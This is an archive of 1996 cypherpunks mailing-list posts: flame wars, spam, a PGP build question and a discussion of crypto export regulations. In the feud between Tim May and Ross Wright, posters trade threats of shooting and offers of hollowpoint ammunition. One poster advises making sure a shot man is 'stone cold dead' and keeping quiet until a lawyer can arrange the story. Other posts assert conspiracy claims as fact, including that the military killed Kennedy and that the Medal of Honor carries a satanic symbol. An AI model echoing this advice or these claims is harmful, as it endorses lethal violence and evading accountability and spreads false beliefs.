     http://jya.com/ear032596.txt (2,570K)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 20:34:11 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
Message-ID: <199612310434.UAA18356@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 19:52, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Mon, 30 Dec 1996, Ross Wright wrote:
> 
> > Be that as it may, it is still no call for threats of gunplay! 
> > That is NOT funny.  I take such things very seriously.
> 
> So let me see if I've got this right.  Threatening to slap 
> someone is okay,

I said "he deserves a slapping".  I never volunteered to carry that 
out.  And, furthermore, I meant a verbal slapping, something akin to 
what is already happening with the good Doctor's attacks.

Sorry about the metaphor.  God damn, must I overstate the obvious?

What pissed me off is:

After I received this letter I sent several olive branches.  No 
reply.  No discussion.  Just leave it with his weapon drawn?  On my 
open and empty hand!?  That's not me.

> but threatening to defend one's self from such an
> attack is not okay?  Interesting.  I guess the old saying still
> applies, "the essence of humor is WHOSE ox is being gored."
> 
> 
>  S a n d y

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 30 Dec 1996 18:06:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: None
Message-ID: <9612310149.AA02729@cow.net>
MIME-Version: 1.0
Content-Type: text/plain



At 1:41 AM 12/25/1996, Anonymous wrote that Noam Chomsky said:
>More than ever, libertarian socialist ideas are relevant, and the
>population is very much open to them. Despite a huge mass of corporate
>propaganda, outside of educated circles, people still maintain pretty much
>their traditional attitudes. In the US, for example, more than 80% of the
>population regard the economic system as inherently unfair and the
>political system as a fraud, which serves the special interests, not the
>people. Overwhelming majorities think working people have too little voice
>in public affairs (the same is true in England), that the government has
>the responsibility of assisting people in need, that spending for education
>and health should take precedence over budget-cutting and tax cuts, that
>the current Republican proposals that are sailing through Congress benefit
>the rich and harm the general population, and so on. Intellectuals may tell
>a different story, but it's not all that difficult to find out the facts.

Can anybody explain in what way Chomsky is an anarchist or a
libertarian?  Opposition to some government schemes but not others
makes a Republican or a Democrat, not an anarchist or libertarian.

Chomsky is a smart man.  What's he up to?

Sir Galahad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BJORN2LUZE@prodigy.com (NATHAN MALLAMACE)
Date: Mon, 30 Dec 1996 18:16:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: US AIRFORCE SITE HACKED
Message-ID: <199612310157.UAA15792@mime4.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



   It is true, so many government sites have been hacked!
The FBI home page was replaced with SATANIC stuff. A picture 
of the upside down cross as a background and various other
changes regarding SATAN.

i think it's funny, but hey it's our own goverment. I wonder 
how often they check their sites. BTW, my friends site -
http://pages.prodigy.com/VT/hackersguide has a link to the
FBI's MOST WANTED LIST. See if you are there! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 30 Dec 1996 18:24:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612310208.AA03047@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Parents who send their children to government operated schools
should read this:
http://www.fni.com/heritage/nov96/Exams.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rvrcp@ocsnet.net
Date: Mon, 30 Dec 1996 21:15:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Have You Read the Book?
Message-ID: <B0000716583@ntserv1.ocsnet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------------------------------------------


The book is called "How to MAKE AMERICA STRONG & WEALTHY ONE PERSON AT A TIME"

There is over THREE MILLION copies in print. AND it is Free.

The book contains information on how you can become DEBT-FREE in a very short time (on the money that you are making today),
and how to easily make more money (thus becoming DEBT-FREE faster) working in your spare time, if you choose to do so.

Get your free copy today, so when someone asks you, "Have you read the Book?", you can say, "I was going to ask you the same question!"

This book will affect your life whether you read it or not.

For more information, call 1-608-375-3130 ext 156900 for a recorded message.
---OR---
E-mail me your Postal Address at rvrcp@ocsnet.net.

Call or write today. There is no obligation.

But I am betting that you will see the great opportunities that this book contains.

-------------------------------------------------------------------------------------
If you wish to be removed from this and all future mailing list, simply send me a message requesting removal.

Thank you very much for a little of your valuable time.

Ray 8->>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Dec 1996 18:30:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Responsibility
Message-ID: <1B5RZD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes:
>Brent E. Turvey (bturvey@connix.com) wrote:
>
>: This NG is not a certified twelve-step program operating under
>: anonymity. This is not even a group of people in recovery operating
>: under any kind of professional guidance at all. It is in essence a
>: PUBLIC FORUM on a given topic. There are no secrets, and no reasonable
>: expectation of privacy. There is also no necessitation for legal
>: confidance.
>
>This has been discussed before.  Most people are aware of how Usenet
>works, and people who don't want their posts linked to their real
>life identities can post anonymously.
>
>: It's also unmoderated. Anyone can look in at any time that they want and
>: review any posts current and past that they see fit thanks to the good
>: people at Dejanews. And anyone can post whatever they want.
>
>Yup.
>
>: However there are a number of individuals engaged in exploitative
>: behaviors with the survivors here and other places on the net. Any
>: therapist or other certified mental health professional can give you a
>: better and more complete definition of "exploitative behaviors" than I
>: could do here.
>
>Changing our tune a bit, aren't we Brent?  The infamous list was
>advertised as a list of predatory offenders and abusers.  Now it
>seems to be just a list of people whose Usenet interactions with
>others you choose to characterize as "exploitative."
>
>: It is mainly for the reason of professional ethics and responsibility
>: that I posted the list of people to be careful of earlier this month.
>: Incumbent in that responsibility is my desire to offer potential victims
>: a survival tool.
>
>Quite frankly, Brent, you offering the survivors in this newsgroup a
>"survival tool" is much like a person on fire offering a gathering of
>penguins an ice cube.  The patrons of this newsgroup are Past Masters
>of survival.  You, on the other hand, are a master only of sticking
>your foot into one bodily opening, while simultaneously sticking your
>head up another.
>
>: By posting that list, I made it totally available to not
>: only the frequent and infrequent subscribers to aar, to explore on their
>: own as they see fit, but to the law enforcement agencies who now monitor
>: usenet as well.
>
>Who, I am sure, are laughing hysterically at all of this.  Please
>continue to pee on your chances of ever doing this professionally
>at every opportunity.
>
>: No strict personal agenda; only a professional one. No personal attacks.
>: Just observations of behavior.
>
>Goodness Brent, do you really think we need you to observe peoples
>behavior for us?  Most of us who have been around the Net since the
>clever little protocols were designed by the engineers, and who can
>even remember events like "The Great Renaming", and the origins of
>Kibo, are fairly astute judges of human behavior.  We have seen
>all sides of every imaginable issue argued from every conceivable
>perspective, and we know the names of all the major players and
>where they stand on each one.
>
>: --
>: Brent E. Turvey, MSc Forensic Science
>: bturvey@connix.com
>: http://www.connix.com/~bturvey/profile.html
>
>Anyone want to join me in nominating Mr. Turvey for the coveted "KOTM"
>degree?  I think...
>
>      Brent E. Turvey, MSc Forensic Science, KOTM Usenet
>
>has a very nice ring to it.  He's definitely goofier than Drs. Grubor
>and Vulis.  I also suggest you visit his unintentionally funny writings
>on autoerotic asphyxiation on the Web.  Brent is a man of many talents. :)
>
>--
>     Mike Duvos         $    PGP 2.6 Public Key available     $
>     mpd@netcom.com     $    via Finger.                      $
>

Is Brent as goofy as the ASALA terrorist (about to be fired by Earthweb
for net-abuse), or even goofier?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 21:26:15 -0800 (PST)
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961231020328Z-64844@INET-02-IMC.microsoft.com>
Message-ID: <32C8A396.1B03@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:
> From:   Ross Wright
> This is the message I got in response to my post regarding Mr. May's
> offensive, racist, and bigoted post about ebonics.   I have made
> overtures towards peace and tried to explain that I thought that the
> Doctor's verbal slapping was not as bad as it seemed, maybe even he
> deserved it!.  He refuses to answer.  He's just a pussy, I guess.
> Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!

> You have to understand - Tim is from California.
> In some areas of the country showing someone your middle finger is the
> universal hand signal for "shoot me".  If you are carrying a gun and
> give such a hand signal you likely to be held at fault if the shooting does
> start.  If you choose to carry, you will be held to a higher standard of
> behavior than those that don't.

This is why you gotta make sure the son-of-a-bitch is stone cold dead.
The number of shots, shooting distance, front or back, and whether the
bozo had a gun, you should be able to work out with an attorney later,
as long as you keep your mouth shut until then.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 21:25:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <9612310327.AA03836@cow.net>
Message-ID: <v03007800aeee54092d22@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 PM -0500 12/30/96, Bovine Remailer wrote:
>Some peckerhead soiled my mailbox with:
>
>>This is the message I got in response to my post regarding Mr. May's
>>offensive, racist, and bigoted post about ebonics.  I have made
>>overtures towards peace and tried to explain that I thought that the
>>Doctor's verbal slapping was not as bad as it seemed, maybe even he
>>deserved it!.  He refuses to answer.  He's just a pussy, I guess.
>>Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!
>
>Thank you for playing, Mr. Grubor. Please pick up your consolation prize at
>the door marked "Out." And stop passing Dimbulb the mailing list messages --
>you know it makes the tumors in his head kick in.
>
>>I would rather have discussed this with you in private e-mail, or
>>over a few beers, but you refuse to answer my e-mail.
>
>Maybe he has you filtered, as the rest of us will now.
>
>*plonk*

Indeed, I added "Ross Wright" to my Eudora filter file after his "slap you
around" message several days ago, so I was mercifully spared from reading
whatever he sent to me (as he claims today). After seeing the messsages
from you, Blanc, and Sandy, who are _not_ filtered, I checked my Trash
folder before emptying it and saw Wright's posting of my private mail to
him.

His claim to "slap me around" means I'll treat him as a hostile agent.

As to why he got *plonked*, this is the price people pay for writing such
things as "maybe we need to slap him around." I have more than 20 in my
filter file now, though many of these are of people who are no longer
spewing on the CP list, for whatever reasons.

Oh, and posting private mail is not considered acceptable behavior.

>(I'd prob'ly buy him the hollowpoints, btw.)

Thanks, but I'm well-stocked on Golden Sabers, and even some Black Talons
(though they were overrated, from studies I've seen).

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 21:47:36 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re: None
In-Reply-To: <9612310149.AA02729@cow.net>
Message-ID: <32C8A89E.6EEB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bovine Remailer wrote:
> At 1:41 AM 12/25/1996, Anonymous wrote that Noam Chomsky said:
> >More than ever, libertarian socialist ideas are relevant, and the
> >population is very much open to them. Despite a huge mass of corporate
> >propaganda, outside of educated circles, people still maintain pretty much
> >their traditional attitudes. In the US, for example, more than 80% of the
> >population regard the economic system as inherently unfair and the
> >political system as a fraud, which serves the special interests, not the

[snip]

> Can anybody explain in what way Chomsky is an anarchist or a
> libertarian?  Opposition to some government schemes but not others
> makes a Republican or a Democrat, not an anarchist or libertarian.

There is something called a Rosetta Stone, i.e. a key to unlock the
mysteries.  In Chomsky's milieu, it's the JFK assassination.

In Chomsky's words, "I can see no forces who would have wanted Kennedy
dead" (quote approximate).

Chomsky is funded by the military (I forget which branch, Navy perhaps).
Since Kennedy, in the best opinion, was executed by the military, it
kinda makes sense....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 30 Dec 1996 18:51:04 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Building PGP on Freebsd?
Message-ID: <199612310247.VAA06642@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



I get this message at the end, for building with the netbsd or the
386bsd config file.  I know theres a simple tweak, can someone remind
me what it is?

Thanks,

Adam



gcc -o pgp pgp.o crypto.o keymgmt.o fileio.o  mdfile.o more.o armor.o
mpilib.o mpiio.o  genprime.o rsagen.o random.o idea.o passwd.o  md5.o
system.o language.o getopt.o keyadd.o  config.o keymaint.o charset.o
randpool.o noise.o zbits.o zdeflate.o zfile_io.o zglobals.o
zinflate.o zip.o zipup.o ztrees.o zunzip.o rsaglue2.o _80386.o
_zmatch.o   ../rsaref/install/unix/rsaref.a
rsaglue2.o: Definition of symbol `_NN_ModExp' (multiply defined)



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Mon, 30 Dec 1996 19:44:34 -0800 (PST)
To: remailer-operators@c2.org
Subject: WinSock Remailer Now Operating Normally
Message-ID: <199612310344.WAA27556@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

The WinSock Remailer, operating at winsock@rigel.cyberpass.net,
is back up and operating normally.

Regards,

Joey Grasty
Jim Ray
WinSock Remailer Operators

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMsh/qw6sYKeTQAOtAQEXnwL7B53vpSeyb7PbR+g+X7PK1KsEG9sqr1ws
Uf9tymq7fJNGHmDl/+7V7asL/i0hmZPLm/XiIniMyutfXCGFWGNQ8kYAvlarq2yp
t3wSKo/TJkgIZERaziAa5gTD77mQcnXT
=VrpC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Mon, 30 Dec 1996 14:00:15 -0800 (PST)
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: Betting and Truth
In-Reply-To: <Pine.SUN.3.91.961229182726.15540A-100000@crl8.crl.com>
Message-ID: <199612302200.PAA19543@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.SUN.3.91.961229182726.15540A-100000@crl8.crl.com>, on 12/29/96 
   at 06:33 PM, Sandy Sandfort <sandfort@crl.com> said:

::Tim's error is assuming that the offer of the bet did not "work" merely
::because the bet was not taken.  All the bets I offered  achieved effects I
::intended.  (Exercise for the student, and all that.)  

    subtle as always, Sandy?  mind control, cypherpunk style.

  ==
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.
            --attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMsg6/704kQrCC2kFAQFuJgP/X/xLJnrnan1BN0kWFotO/cSjj/IcbJHs
gNVSEcy+TI1/7zqu1u8fIrfWwYXmLQUhAuqFyFGw4fh7S8Mt5oHTuF7KgS4LO1gQ
Ny6md/VxoNrLpsaKjZaxRNd6MDDlQuivk4e0PdMbFjj9I6j1T2EWITCENvypDD/9
o2tMXubXk+g=
=UN7P
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 21:49:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
In-Reply-To: <199612310304.TAA16366@adnetsol.adnetsol.com>
Message-ID: <v03007800aeee5a8db517@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM -0800 12/30/96, Sandy Sandfort wrote:

>On Mon, 30 Dec 1996, Ross Wright wrote:
>
>> Be that as it may, it is still no call for threats of gunplay!  That
>> is NOT funny.  I take such things very seriously.
>
>So let me see if I've got this right.  Threatening to slap
>someone is okay, but threatening to defend one's self from such
>an attack is not okay?  Interesting.  I guess the old saying
>still applies, "the essence of humor is WHOSE ox is being gored."

As I said, I have been filtering Ross Wright, along with about 20 other
such twits. I learned of his posting of my private mail to him from the
responses such as this one (and by Blanc, and one via a remailer).

Wright needs to learn some manners. As for my _threatening_ him, he's
welcome to contact his local police department if he feels I was being
"unfair" by responding to his threat to me by saying I'd blow him away if
he tried it.

As for me, if he carries through on his threat to "slap me around," I'll
welcome the chance to defend myself using the tools at my disposal.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 22:12:28 -0800 (PST)
To: NATHAN MALLAMACE <BJORN2LUZE@prodigy.com>
Subject: Re: US AIRFORCE SITE HACKED
In-Reply-To: <199612310157.UAA15792@mime4.prodigy.com>
Message-ID: <32C8AE6F.3D89@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


NATHAN MALLAMACE wrote:
> It is true, so many government sites have been hacked!
> The FBI home page was replaced with SATANIC stuff. A picture
> of the upside down cross as a background and various other
> changes regarding SATAN.
> i think it's funny, but hey it's our own goverment. I wonder
> how often they check their sites. BTW, my friends site -
> http://pages.prodigy.com/VT/hackersguide has a link to the
> FBI's MOST WANTED LIST. See if you are there!

Just in case you start to feel sympathetic towards the government, the
upside-down cross is *not* the premier symbol of real satanic worship.

I got it from the horse's mouth, so to speak:  The most supreme symbol
of satanic worship is an upside-down five-pointed star (symbolizing
the goat's head) with a circle around it.

User's of this symbol include:  Freemasons (on city signboards, bumper
stickers, etc.) for one, and the U.S. Congressional Medal of Honor for
another.  These are *serious* people, so tread carefully.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 30 Dec 1996 19:28:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto reg clarification from Commerce Department
Message-ID: <Pine.sos5.3.91.961230222036.23067H-100000@cp.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe that Kutz is speaking the truth. Keep in mind the paragraph with
which you're concerned is not the meat of what's being amended. That lies
in the next line, Section 736.2(b)(7)(ii), which reads: 

  You may not, without a license from BXA, provide
  certain technical assistance to foreign persons with
  respect to encryption items, as described in
  Sec. 744.9 of the EAR.

"Technical assistance" is still troubling, but not as much as investment
would be. Assistance is aimed at training, and the regulations somewhat
exempt classroom discussions. Of course, the uncertainty and the potential
chilling effects are good reasons to continue with the court challenges. 

-Declan

---

> I just got of the phone with Bruce Kutz, Export Policy Analyst, Office of
> Strategic Trade and Foreign Policy Controls. (202) 482-0092. He seems to be
> the contact person for the new regs.
> 
> I pointed Mr. Kutz to the section that alarmed me:
> 
> Sec. 736.2  General prohibitions and determination of applicability.
>       
>      * * * * *
>       
>          (7) General Prohibition Seven--Support of Certain Activities by
>      U.S. persons--(i) Support of Proliferation Activities (U.S. Person
>      Proliferation Activity). If you are a U.S. Person as that term is
>      defined in Sec. 744.6(c) of the EAR, you may not engage in any
>      activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
>      prohibits the performance, without a license from BXA, of certain
>      financing, contracting, service, support, transportation, freight
>      forwarding, or employment that you know will assist in certain
>      proliferation activities described further in part 744 of the EAR.
>      There are no License Exceptions to this General Prohibition Seven in
>      part 740 of the EAR unless specifically authorized in that part.
> 
> Mr. Kutz seemed surprised. Apparently he had not been aware that this
> section was included in the new crypto regs. He then assured me that
> 
> 1. Proliferation in the context of this paragraph applies only to
> proliferation of
> a) nuclear (bomb) technology
> b) missile technology
> 
> He read to me EAR Sec. 744.6 (a) or (b), which are referred to in the
> paragraph in question. Sec. 744.6 (a) or (b) seems to support this view.
> However, he did not explain to me why the paragraph was included in the
> crypto export regulations when it only applies to nukes and missiles.
> 
> 2. The Department of Commerce has no intention of banning the financing and
> contracting of non-US crypto development.
> 
> 3. Technical assistance to non-US parties requires a license.
> 
> Mr. Kutz encouraged me to make use of the public comment period and ask
> Commerce to clarify the section. Public comments will be accepted until
> February 13, 1997. [Public comment is requested only after the new regs
> took effect...]
> 
> I received the impression that Mr. Kutz genuinely believes that the section
> in question does not apply to crypto. If I was concerned about potentially
> violating the regulations, I would try to get a written statement from
> Commerce that Mr. Kutz's view is indeed correct. As always, IANAL.
> 
> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>    Make your mark in the history of mathematics. Use the spare cycles of
>    your PC/PPC/UNIX box to help find a new prime.
>    http://www.mersenne.org/prime.htm
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 30 Dec 1996 22:25:06 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
In-Reply-To: <199612310434.UAA18356@adnetsol.adnetsol.com>
Message-ID: <Pine.SUN.3.91.961230221640.9609A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 30 Dec 1996, Ross Wright wrote:

> I said "he deserves a slapping".  I never volunteered to carry that 
> out.  And, furthermore, I meant a verbal slapping, something akin to 
> what is already happening with the good Doctor's attacks.

And Tim never threatened Ross.  He merely posited an "if, than" 
response to a hypothetical assault.  If Ross does no slapping, 
Tim won't shoot him.  QED.  No reason to get bent out of shape.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 30 Dec 1996 19:41:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: None
In-Reply-To: <9612310149.AA02729@cow.net>
Message-ID: <v0300783aaeee37d536d4@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 pm -0500 12/30/96, Bovine Remailer wrote:
>Chomsky is a smart man.  What's he up to?

"consent manufacturing" ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 93865@net.122
Date: Mon, 30 Dec 1996 22:31:08 -0800 (PST)
To: username
Subject: [[[   NEW !  Computer Based Business.    ]]]
Message-ID: <19961231062532.AAA13772@Compaq>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PRESS REPLY. Send all inquiries, and remove request to
http://business.atcon.com/parker/PSM/Tony/tonypsm.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 30 Dec 1996 19:43:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <9612310327.AA03836@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Some peckerhead soiled my mailbox with:

>This is the message I got in response to my post regarding Mr. May's
>offensive, racist, and bigoted post about ebonics.  I have made
>overtures towards peace and tried to explain that I thought that the
>Doctor's verbal slapping was not as bad as it seemed, maybe even he
>deserved it!.  He refuses to answer.  He's just a pussy, I guess. 
>Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!

Thank you for playing, Mr. Grubor. Please pick up your consolation prize at
the door marked "Out." And stop passing Dimbulb the mailing list messages --
you know it makes the tumors in his head kick in.

>I would rather have discussed this with you in private e-mail, or 
>over a few beers, but you refuse to answer my e-mail.

Maybe he has you filtered, as the rest of us will now.

*plonk*

(I'd prob'ly buy him the hollowpoints, btw.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 22:20:27 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: If He Doesn't Like Me
Message-ID: <199612310620.WAA20583@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 21:32, Timothy C. May wrote:

> 
> Indeed, I added "Ross Wright" to my Eudora filter file after his
> "slap you around" message several days ago, so I was mercifully
> spared from reading
> 
> 
> As to why he got *plonked*, this is the price people pay for writing
> such things as "maybe we need to slap him around." I have more than
> 20 in my
> 
> Oh, and posting private mail is not considered acceptable behavior.
> 

What's next?  If Timmy doesn't like what I write will I be kicked off 
like the Doctor?  Wow!  From Timmy's trash bin to Kook of the Month 
FAME!!!!!  What more could I ask for?  Fuck You, Too, Timmy!  But I 
refuse to censor my own input, so I'll still have to see your fucking 
stuff.  ShitHead.  Hostile Agent!

How come it took over a year to get this far?  

Ross (Proud to be in Timmy's Filter File) Wright

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Dec 1996 22:45:43 -0800 (PST)
To: tcmay@got.net>
Subject: Re: "Structuring" of Communications a Felony?
Message-ID: <199612310645.WAA12065@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:35 PM 12/29/96 -0800, Steve Schear wrote:
>>I predict that we will see within two years a law making it illegal to
>>"structure communications" with the intent to avoid traceability,
>>accountability, etc.
>>
>>This would be along the lines of the laws making it illegal to "structure"
>>financial transactions with the (apparent) intent to avoid or evade certain
>>laws about reporting of income, reporting of transactions, etc.
>>
>>How long before the U.S. Code declares "attempting to obscure or hide the
>>origin of a communication" to be a felony? That would rule out orninary
>>mail without return adresses, but I think there are ample signs we're
>>already moving toward this situation (packages that could be bombs
>>putatively require ID, talk of the Postal Service handling the citizen-unit
>>authentication/signature system, etc.).
>>--Tim May
>
>Tim, I think that this is highly unlikely.  The SC has ruled repeatedly
>that anonymous speech is a foundation of American politics (e.g., the
>Federalist Papers).
>-- Steve

When Senator Leahy's first crypto bill was proposed early this year, at 
first glance it appeared to help our cause. Many people around here at least 
gave it lukewarm support.  However, it contained a section making  (quote 
approximate) "use of encryption to thwart an investigation" a crime.  I 
pointed out, quite loudly, that any encrypting anonymous remailer could be 
considered practically automatically guilty of this.  In fact, the feds 
could simply start a sham "investigation," perhaps assisted by a phony 
message sent by a confederate through the remailer, and then declare that 
their investigation had been "thwarted."

Whether such an interpretation would fly was, obviously, a question, but by 
the time the SC had issued its ruling the remailer's hardware would have 
been siezed collecting dust in some Fed warehouse for 2-3 years.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 30 Dec 1996 19:39:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: With my deepest regards....
Message-ID: <961230223902_1156080622@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-30 17:46:12 EST, you write:

<< AwakenToMe@aol.com wrote:
 >  Adam Breaux wrote:
 >  > I am withdrawing from this list. Not because of the volume of
 >  > email...that I can deal with...but what I cannot deal with is the
 >  > volume of garbage and egotistical ranting[snippo]
 >  Note to cypherpunks:  This guy complains about the problem, but he *is*
 >  the problem.  *He* wants to tell us *he's* leaving.  Talk about ego-
 >  tistical ranting!  What a hypocrite.
 
 > Since I never said I dont contribute to the problem.. I think Ill point
 > out... that in a reverse notion...He isn't the problem.  What you replied
 > back is the problem.
 
 Argumentum ad nauseam.  The point is, Adam (I think) wanted to tell us
 he's leaving.  Well, who gives a shit, anyway?  Instead of ranting
 against me, tell the cypherpunks why they should care that this
 particular individual is "leaving the list". >>

he did: =-}

<<I am withdrawing from this list. Not because of the volume of 
email...that I can deal with...but what I cannot deal with is the 
